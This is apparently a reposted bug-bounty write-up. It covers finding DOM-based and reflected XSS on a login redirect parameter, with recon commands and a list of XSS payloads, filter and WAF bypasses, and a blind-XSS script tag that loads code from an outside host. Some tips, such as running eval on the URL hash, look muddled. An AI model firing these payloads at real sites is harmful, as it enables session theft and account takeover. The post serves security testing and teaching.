Listen to this Post
Last month, during Bug Hunting I discovered both DOM-based XSS and Reflected XSS (RXSS) vulnerabilities on a login page of a Korean website.
Example:
https://sub[.]example[.]com/login?redirectTo=abc
My Approach
Recon was performed using Subfinder and Amass:
subfinder -d example[.]com -all -recursive -o subd.txt amass enum --passive -d example[.]com -o subd1.txt
After merging both enumeration results, I used Katana to enumerate endpoints:
katana -list fsubd.txt -silent | tee ep.txt katana -list fsubd.txt -kf all -d 30 -c 50 -jc -silent | tee ep1.txt
After identifying live targets with httpx, I filtered potential XSS endpoints with:
cat aep.txt | anew | gf xss | uro | tee pxss.txt
I tested the final list with multiple payloads and confirmed working XSS vulnerabilities (both DOM-based and reflected).
You can use Caido to automate testing multiple payloads on the target.
You Should Know:
1. Manual XSS Testing with cURL
curl -s "https://example.com/login?redirectTo=javascript:alert(1)" | grep -i "alert"
2. Automating XSS with Dalfox
dalfox url "https://example.com/login?redirectTo=XSS" --custom-payload xss-payloads.txt
3. Using OWASP ZAP for XSS Scanning
docker run -v $(pwd):/zap/wrk -t owasp/zap2docker-stable zap-baseline.py \ -t https://example.com/login -g gen.conf -r report.html
4. Crafting XSS Payloads for Bypassing Filters
< svg/onload=alert(document.domain)> <img src=x onerror=alert(1)>
5. Checking for DOM XSS with Browser Console
console.log(document.location.hash); eval(document.location.hash.substring(1));
6. Using XSS Hunter for Blind XSS
<script src="https://xss.hunter/x.js"></script>
7. Encoding Payloads for Obfuscation
echo -n "<script>alert(1)</script>" | base64
8. Testing for HTTP Parameter Pollution (HPP) XSS
curl "https://example.com/login?redirectTo=test&redirectTo=javascript:alert(1)"
9. Using Burp Suite for XSS Testing
- Intercept request → Send to Repeater → Insert XSS payload → Check response.
10. Bypassing WAFs with Alternative XSS Vectors
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click</a>
What Undercode Say
XSS remains a critical web vulnerability due to improper input sanitization. Automation tools like Dalfox, Katana, and Caido enhance detection, but manual testing is still essential for bypassing filters. Organizations must implement strict Content Security Policies (CSP) and input validation to mitigate risks.
Prediction
With increasing reliance on JavaScript frameworks, DOM-based XSS will rise, requiring advanced detection techniques. AI-powered scanners may soon automate complex XSS detection.
Expected Output:
- A detailed report confirming XSS vulnerabilities.
- Proof-of-concept (PoC) demonstrating exploitation.
- Recommendations for mitigation (CSP, input sanitization).
Relevant URLs:
IT/Security Reporter URL:
Reported By: Gagan Rohila – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
